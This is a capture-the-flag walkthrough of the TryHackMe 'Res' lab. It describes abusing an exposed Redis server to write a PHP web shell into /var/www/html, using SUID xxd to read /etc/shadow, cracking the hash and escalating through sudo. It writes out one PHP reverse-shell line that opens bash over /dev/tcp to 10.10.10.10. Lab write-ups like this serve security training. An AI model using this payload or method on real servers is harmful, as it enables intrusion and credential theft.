Date: 27/03/2022

Difficulty: Easy

CTF: https://tryhackme.com/room/res


Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

Scan the machine, how many ports are open?

Untitled

What’s the database management system installed on the server? What port is the database management system running on?What’s is the version of management system installed on the server?

Untitled

Compromise the machine and locate user.txt

First of all, let’s visit the webpage hosted on the port 80:

Untitled

It displays a default page of an apache server recently installed.

As we have seen, there is a redis server running on port 6379. After some reading, I found that there is a way to interact with this service.

Let’s download the redis application:

https://redis.io/docs/getting-started/
https://redis.io/docs/manual/cli/

Let’s test the connection:

Untitled

It seems like we have connection with the redis server!

Untitled

The info command seems to be helpful to retrieve redis server information:

Untitled

According to this webpage (https://book.hacktricks.xyz/pentesting/6379-pentesting-redis) there is a way to do a Remote Code Execution on a redis server:

Untitled

We should know the path where we want to write the php file. Since we have visited the page before, we know that the folder is: /var/www/html

So, following the steps we do the same in our case:

Untitled

Now let’s visit the page:

Untitled

It works, now let’s try to write a reverse shell in php:

Untitled

Let’s open a netcat listener in our machine:

Untitled

And let’s visit the rs.php file:

Untitled

We got a connection but it quickly disconnects…

Let’s try with this other one-line php reverse shell:

<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.10.10/1234 0>&1\'"); ?>

Untitled
Untitled

Yeah, this one works!

Untitled

We found the key file in the /home/vianka folder.

What is the local user account password?

Before anything, let’s try to stabilize this shell:

Untitled

Python is installed in the machine, so let’s use it:

Untitled

Ok, shell stabilized, now let’s look for the local user account password. Can we read /etc/shadow file?

Untitled

Nope, we can’t.

Something interesting in the history?

Untitled

Let’s see if we find some keys in the user directory… nothing useful I can see…

After spending some time looking for ssh keys or something useful, I look for files with SUID activated:

Untitled

From this list, xxd appears in the GTFO Bins list:

Untitled

Exploiting this, we should be able to read /etc/shadow file!

Untitled

Yeah! Now with the info of /etc/passwd, let’s use unshadow and John the ripper to crack the hash!

Untitled

Unshadow done, now let’s crack it!

Untitled

Cool!

Escalate privileges and obtain root.txt

Let’s login as vianka and see if we have more permissions:

Untitled

Enough permissions to access to root folder?

Untitled

Nope. Let’s see what we can execute with sudo:

Untitled

Really? We can run any command using sudo…

Untitled

Woah

Untitled

And this quickly we get the last flag!